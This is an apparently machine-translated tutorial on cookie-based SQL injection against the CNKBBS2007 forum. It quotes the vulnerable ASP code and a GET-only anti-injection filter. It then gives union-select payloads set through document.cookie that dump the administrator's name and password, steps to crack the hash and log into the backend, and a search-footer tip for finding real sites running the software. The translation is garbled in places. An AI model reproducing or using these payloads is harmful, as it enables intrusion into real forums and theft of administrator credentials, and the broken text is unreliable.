Cookie injection methods and principles

Nowadays, many websites adopt the general anti-injection program, so will my website be helpless? The answer is no, because we can use the cookie injection method, and many general anti-injection programs are not prepared for this injection method.

Before talking about it, let's review the knowledge of the Request object in ASP scripts. in the previous sections, we have mentioned that the common methods of GET and POST for obtaining the client-submitted data are as follows, at the same time, the request object can obtain data without using a set, that is, directly using "request (" name ")", but it is inefficient and error-prone. When we omit a specific set name, ASP searches by QueryString, from, cookie, servervariable, and set order. It integrates cookies in the request object members, meaning that "All cookie values sent by the user system are read, from the second lecture on "Cookie spoofing intrusion and Principles", we know that cookies are a text file stored on the client computer and can be modified so that we can use Request. cookie method to submit the value of the variable, so as to exploit the system vulnerability for injection attacks.

First of all, let's take a look at the latest version of the network scene Forum "(CNKBBS2007) network scene Forum 2007v5. 0" official "http://www.cnetking.com/websys2.asp? Id = 26 "the release date is. After opening the source code of the system, the following code is displayed in the" user_RxMsg_detail.asp "file:

 

<! -- # Include file = "opendb. asp" -->
(Call the opendb. asp file)
<! -- # Include file = "char. asp" -->
<%
Call CheckUserLogin (username)
Dim action, s, id
Id = request ("id") (get the variable submitted by the customer, assign a value to the id, not filtered, and do not specify the way to submit)
If id <> "" then Call IsNum (bid) (this is where the programmer appears, note bid <> id)
Conn.exe cute ("update cnk_Users_RxMsg set readed = 1 where id =" & id) set read
Rs. open "select * from cnk_users_RxMsg where id =" & id, conn, 1, 3

Open the "opendb. asp" file.

<% Option Explicit
Response. Buffer = true %>
<! -- # Include file = "fzr. asp" --> (call the fzr. asp file)
<! -- # Include file = "cnkdata/dbname. asp" -->
<! -- # Include file = "config. asp" -->
..................

Now it is the file connecting to the database, where the fzr. asp file is called, and we open the fzr. asp file.

<%
-------- Copyright ------------------
SQL universal anti-injection program
Aseanleung
-------- Definition section ------------------
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
Dim fso1, all_tree2, file1, files, filez, fs1, zruserip
If Request. QueryString <> "" Then (judge the data submitted by Request. QueryString (the customer uses the GET method), and does not specify the data submitted by other methods)
Customize the string to be filtered, separated by "|"
Fy_In = "|; | % | * | and | exec | insert | select | delete | update | count | chr | mid | master | truncate | char | declare | script "(blocking common SQL Injection statement)
Fy_Inf = split (Fy_In, "| ")
For Each Fy_Get In Request. QueryString
For Fy_Xh = 0 To Ubound (Fy_Inf)
If Instr (LCase (Request. QueryString (Fy_Get), Fy_Inf (Fy_Xh) <> 0 Then
Zruserip = Request. ServerVariables ("HTTP_X_FORWARDED_FOR ")
If zruserip = "" Then zruserip = Request. ServerVariables ("REMOTE_ADDR ")
Response. Write "content contains invalid characters! Please do not have or and or other characters. Please remove these characters and send them again !! <Br>"
Response. Write "if you want to attack a website, the system records your operations <br>"
Response. Write "Operation IP:" & zruserip & "<br>"
Response. Write "operation time:" & Now & "<br>"
Response. Write "Operation page:" & Request. ServerVariables ("URL") & "<br>"
Response. Write "submission method: GET <br>"
Response. Write "Submit parameters:" & Fy_Get & "<br>"
Response. Write "submit data:" & Request. QueryString (Fy_Get)
......................

 

Obviously, it is an SQL universal anti-injection program file (the above red letter is an explanation of the Code)

After reading the code, let's sort out the following ideas: due to a programmer's error, IDs are not filtered and then queried in SQL statements. This is the cause of the injection vulnerability, although the program introduced anti-injection programs to prevent the use of common SQL statements, it only judges the data submitted by the customer using the GET method, but does not judge the data submitted by other methods, as a result, the customer can use the Request. cookie method to submit the value of the variable, and bypass the SQL anti-injection program (Summary: cookie injection conditions: the system directly uses "request (" name ") "Get the data submitted by the customer, and do not filter the variables submitted by the customer, and there is no restriction on the Request in the anti-injection program. cookie. Currently, anti-injection program 3.0 only restricts the use of GET and POST submission methods ).

Let's learn about coolie injection statements.

Cookie injection statement: alert (document. cookie = "id =" + escape ("this is asp? Id = the value xx represents AFTER xx) and (injection attack code here )"));

The knowledge of the javascript language is used here. I break down the meaning of this statement as follows for your understanding:

1: The alert () method of the "alert ()" display information dialog box. It generates an independent small window called a dialog box to display a message and a button. (This is often used across sites)

2: "document. cookie "when processing a cookie, javascript saves it as an attribute of the document Object. Its attribute name is cookie. With this attribute, we can create and read cookie data, in the program, you can use: "alert (document. cookie) "umument (document) object indicates the HTML (output data to the page) displayed in the browser. The cookie attribute is a cookie that allows reading and writing HTTP; string type

4: escape () function. It converts all non-letter characters in a string into equivalent strings represented by letters and numbers and has the function of encoding strings. in general, the cookie is usually sent to the browser by the server program through HTTP request and response hair. However, using javascript, you can set the cookie format in the local browser: the attribute of name = value is the name of the specified cookie data item. value is the value corresponding to the name. It is a string and can contain a series of characters. name and value cannot contain semicolons, comma and blank, (50 "and 1 = 1") There are semicolons, commas and white spaces, so we need to use the escape () function to encode them

You can understand the meaning of the entire sentence above, that is, to set the value of the cookie data item currently created for calling. When setting the cookie, they are first saved in the browser's memory. When exiting the browser, to be written to the hard disk. (This is why the link address is entered after exiting in the following operations)

Finally, let's test the procedure:

1: Open the chinnet forum set up on the local host: register a user, we will receive a short message from the Administrator, we open the short message Link (note the parameter id here)

2: Clear the browser URL and enter "alert (document. cookie = "id =" + escape ("corresponding parameter id value and 1 = 1"); a box will pop up later,

3: Enter http: // 127.0.0.1/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator (the normal page is returned, indicating that the SQL anti-injection program is bypassed)

3: Enter alert (document. cookie = "id =" + escape ("1 and 1 = 2"); then enter: http: // 127.0.0.1/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator (the time and content are not displayed, which means we can inject it)

4: You can view the system database and find that the cnk_users_RxMsg table contains eight fields. The Cnk_Admin table stores administrator information. The AdminName and AdminPassword fields correspond to the account and password respectively, we use the joint query statement, and then enter: alert (document. cookie = "id =" + escape ("1 and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8 from Cnk_Admin") Then clear the address bar and enter asp "> http: // 127.0.0.1/cnkbbs5.2 _ ac/user_RxMsg_detail.asp. The numbers 4 and 5 are displayed.

5: Clear the address bar again and enter: alert (document. cookie = "id =" + escape ("1 and 1 = 2 union select 1, 2, 3, AdminName, AdminPassword, 6, 7, 8 from Cnk_Admin"). After submission, clear the address bar, input: http: // 127.0.0.1/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator, so we can see the Administrator's password and account on the page.

6: The obtained password into the http://www.cmd5.com Site query, that administrator plaintext password is admin, on the home page of the website we can log on to the background, we can also use the keyword "Powered by CNKBBS2007 (5.2)" to find a website using this system on the Internet (but not many). Let's practice manual injection, don't break it! However, when using this type of injection, it requires two manual operations to complete, which is also prone to errors, you must be careful.